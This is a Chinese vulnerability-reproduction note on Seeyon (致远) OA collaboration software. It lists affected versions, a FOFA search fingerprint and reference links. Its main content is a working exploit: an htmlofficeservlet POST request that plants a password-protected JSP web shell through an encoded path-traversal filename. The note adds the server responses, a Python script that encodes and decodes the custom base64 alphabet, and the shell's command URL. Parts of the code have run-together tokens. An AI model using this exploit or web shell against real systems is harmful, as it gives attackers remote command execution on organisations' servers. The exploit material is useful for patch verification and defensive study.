漏洞复现-致远OA

致远OA

致远A8-V5协同管理软件V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1

漏洞指纹 fofa app=“用友-致远OA” “seeyon”
https://www.cnblogs.com/flashine/articles/14325665.html 复现
https://www.cnblogs.com/nul1/p/12803555.html

/seeyon/htmlofficeservlet

EXP

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length:1121
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache

DBSTEP V3.03550666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66<%@ page language="java"import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!publicstatic String excuteCmd(String c){StringBuilder line =newStringBuilder();try{Process pro = Runtime.getRuntime().exec(c);BufferedReader buf =newBufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while((temp = buf.readLine())!= null){line.append(temp+"\n");}buf.close();}catch(Exception e){line.append(e.getMessage());}return line.toString();}%><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

响应

DBSTEP V3.03860666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6<%@ page language="java"import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!publicstatic String excuteCmd(String c){StringBuilder line =newStringBuilder();try{Process pro = Runtime.getRuntime().exec(c);BufferedReader buf =newBufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while((temp = buf.readLine())!= null){line.append(temp+"\n");}buf.close();}catch(Exception e){line.append(e.getMessage());}return line.toString();}%><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

#!/usr/bin/env python2
# -*- coding: utf-8-*-#qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
# ..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp
importbase64

a ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="  
b ="gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
out =""

c =input("\n1.加密  2.解密  0.退出\n\n请选择处理方式：")while c !=0:
    out =""if c ==1:
        str =raw_input("\n请输入要处理的字符串：")
        str = base64.b64encode(str)for i in str:
                out += b[a.index(i)]print("\n处理结果为："+out)
    elif c ==2:
        str =raw_input("\n请输入要处理的字符串：")for i in str:
                out += a[b.index(i)]
        out = base64.b64decode(out)print("\n处理结果为："+out)else:print("\n输入有误！！只能输入“1”和“2”，请重试！")
    c =input("\n1.加密  2.解密  0.退出\n\n请选择处理方式：")

HTTP/1.1200 OK
Date: Sat,16 Apr 202213:01:42 GMT
Connection: close
Server: Seeyon-Server/1.0
Content-Length:1116

DBSTEP V3.03860666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLKhqUwAqUKEwfuXwiC6
<%@ page language="java"import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!publicstatic String excuteCmd(String c){StringBuilder line =newStringBuilder();try{Process pro = Runtime.getRuntime().exec(c);BufferedReader buf =newBufferedReader(newInputStreamReader(pro.getInputStream()));String temp = null;while((temp = buf.readLine())!= null){line.append(temp+"\n");}buf.close();}catch(Exception e){line.append(e.getMessage());}return line.toString();}%><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/

https://blog.csdn.net/xd_2021/article/details/122232463

致远OA 登录框处存在Log4j2漏洞

请输入要处理的字符串：qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
b'..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp'
 

test123456.jsp?pwd=asasd3344&cmd=ipconfig

致远A8-V5协同管理软件 V6.1SP2

v6.1 sp2
.A6 V7.1SP1
上传漏洞
https://www.cnblogs.com/bonelee/p/15160660.html

https://blog.csdn.net/weixin_43227251/article/details/115616761

致远 A8+ V7.1

公开日期：2021-06-03
漏洞编号：CNVD-2021-32773
危害等级：高危
漏洞描述：致远A8+协同管理软件存在命令执行漏洞

北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp1
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp2
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp3
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.1

远程任意文件上传文件上传漏洞
致远A8-V5协同管理软件 V6.1sp1
致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致远A8+协同管理软件V7.1

A6 员工敏感信息泄露https://blog.csdn.net/qq_42660246/article/details/116176625

http://www.javashuo.com/article/p-ejsncfjj-nu.html